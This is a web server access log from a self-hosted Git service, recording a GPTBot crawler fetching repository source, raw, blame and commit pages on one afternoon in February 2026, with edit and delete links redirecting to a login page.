"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13293] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC%2fCMakeCCompilerId.c" [Client 74.7.227.38] [Length 52994] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33337] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15253] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 11055] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:16:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor_full.spec" [Client 74.7.227.38] [Length 25672] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:16:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor_full.py" [Client 74.7.227.38] [Length 34449] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:16:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:16:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14026] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42418] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14244] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7801] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" -[17/Feb/2026:16:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 19422] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13645] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12390] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13510] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:16:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71837] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:16:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13547] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13548] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13545] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=source" [Client 74.7.227.38] [Length 12216] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:16:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md?display=rendered" [Client 74.7.227.38] [Length 15779] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:16:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 